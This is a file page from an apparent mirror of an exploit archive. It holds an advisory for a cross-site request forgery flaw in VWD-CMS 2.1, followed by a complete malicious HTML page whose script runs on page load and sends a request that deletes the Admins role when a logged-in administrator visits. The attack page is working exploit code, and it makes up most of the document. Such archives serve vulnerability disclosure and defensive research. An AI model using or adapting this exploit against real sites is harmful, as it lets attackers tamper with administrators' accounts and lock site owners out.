bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/15058.html
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

85 lines
No EOL
2.4 KiB
HTML
Raw Blame History

'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
Title : VWD-CMS CSRF Vulnerability
Affected Version : VWD-CMS version 2.1
Discovery : www.abysssec.com
Vendor : http://www.vwd-cms.com/
Demo : http://server/templates/Emerald.aspx
http://server/templates/balloonr.aspx
Download Links : http://vwdcms.codeplex.com/
Admin Page : http://Example.com/login.aspx
http://www.exploit-db.com/moaub-20-vwd-cms-csrf-vulnerability/
'''
1)CSRF :
===========================================================================================
The VWD-CMS have CSRF Vulnerability in order to remove any Role especially Admins Role.
With this Vulnerability you can navigate the admin to visit malicious site (when he is already logged in)
to remove a role.
In this path a role could be removed::
http://Example.com/VwdCms/Members/RoleEdit.aspx?delete=yes&role=RoleName
(RoleName can be Admins or Members)
here is HTML File with AJAX Code and with GET Method for this operation that is enough to Admin meet it.
The Source of HTML Page (Malicious Site)
===========================================================================================
<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Admins Role in VWD-CMS.
<script>
function RemoveRole() {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
} catch (e) {}
var http = false;
if (window.XMLHttpRequest) {
http = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
http = new ActiveXObject("Microsoft.XMLHTTP");
}
url = "http://server/VwdCms/Members/RoleEdit.aspx?delete=yes&role=Admins";
http.onreadystatechange = done;
http.open('GET', url, true);
http.send(null);
}
function done() {
if (http.readyState == 4 && http.status == 200)
{
}
}
</script>
</head>
<body onload ="RemoveRole();">
</body>
</html>
===========================================================================================
Reference in a new issue View git blame Copy permalink